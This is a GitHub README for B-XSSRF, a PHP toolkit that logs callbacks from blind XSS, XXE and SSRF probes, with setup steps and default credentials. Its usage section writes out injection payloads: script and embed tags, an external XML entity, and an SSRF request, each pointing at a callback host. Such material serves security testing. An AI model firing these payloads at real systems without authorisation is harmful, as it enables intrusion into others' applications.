Awesome

<h1 align="center"> <br> <a href=""><img src="https://github.com/SpiderMate/B-XSSRF/blob/master/img/icon.png" width="70" height="70" alt="B-XSSRF"></a> <br> B-XSSRF <br> </h1> <h4 align="center">Toolkit to detect and keep track on Blind XSS, XXE & SSRF</h4> <p align="center"> <a href="https://github.com/SpiderMate/PS-Ducky/releases"> <img src="https://img.shields.io/badge/release-v1.0-blue.svg"> </a> <a href="https://github.com/SpiderMate/PS-Ducky/issues"> <img src="https://img.shields.io/badge/issues-0-red.svg"> </a> <a href="https://github.com/SpiderMate/PS-Ducky/issues"> <img src="https://img.shields.io/badge/php-5-green.svg"> </a> </p> <img src="https://github.com/SpiderMate/B-XSSRF/blob/master/img/dashboard.png" alt="B-XSSRF">

SETUP

Upload the files to your server.
Create a Database and upload <b>database.sql</b> file to it.
Change the <b>DB Credentials</b> in <b>db.php</b> file.
Ready.

USAGE

BLIND XSS

<embed src="http://mysite.com/bxssrf/request.php">
<script src="http://mysite.com/bxssrf/request.php">

BLIND XXE

<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>

SSRF

GET /testssrf.php=http://mysite.com/bxssrf/request.php

DEFAULT CREDENTIALS

USER : admin@test.com
PASS : 123456